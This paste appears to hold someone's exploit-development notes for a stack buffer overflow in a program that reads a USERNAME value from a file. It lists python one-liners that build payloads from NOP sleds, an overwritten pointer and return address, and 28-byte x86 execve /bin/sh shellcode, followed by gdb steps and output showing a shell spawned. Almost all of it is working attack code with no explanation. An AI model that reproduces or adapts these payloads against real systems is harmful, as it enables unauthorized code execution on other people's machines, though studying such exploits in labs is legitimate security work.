Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- &FD = \x08\xb0\x04\x08 (0x804b008)
- controlling FD:
- !echo $(python -c 'print "USERNAME=" + "A" * 136 + "\x08\xb0\x04\x08"') > /tmp/lol
- !echo $(python -c 'print "USERNAME=" + "\x90" * 28 + "EIPP" + "\x90" * 76 + "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80" + "\x08\xb0\x04\x08"') > /tmp/lol
- !echo $(python -c 'print "USERNAME=" + "zGMPOIMbhDCbwOZmzaNuIc1HKRKxzeSZbUpmZe14vDPC9M1eA6MW852OT7PYPxW3fhVfpFt0DYQQ6OSLlIgbBrKTl45yfTKYvoYUaxBh7bEZpcH1JNw4xGyKZ2V4ILPIIUy3jfbs" + "\x08\xb0\x04\x08" + "B" * 28 + "ZZZZ"') > /tmp/lol
- |
- |
- \
- \
- -> 0x5a53657a = zeSZ
- !echo $(python -c 'print "USERNAME=" + "\x90" * 28 + "EIPP" + "\x90" * 104 + "\x08\xb0\x04\x08" + "B" * 28 + "ZZZZ"') > /tmp/lol
- !echo $(python -c 'print "USERNAME=" + "\x90" * 28 + "\x24\xfb\xff\xbf" + "\x90" * 76 + "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80" + "\x08\xb0\x04\x08" + "B" * 28 + "ZZZZ"') > /tmp/lol
- gdb$ unset env LINES
- gdb$ unset env COLUMNS
- gdb$ r /tmp/lol
- process 18692 is executing new program: /bin/bash
- sh-4.2$
- 0xbffffb24 = \x24\xfb\xff\xbf
- shellcode \x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80
- exec /bin/sh 28 Bytes
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
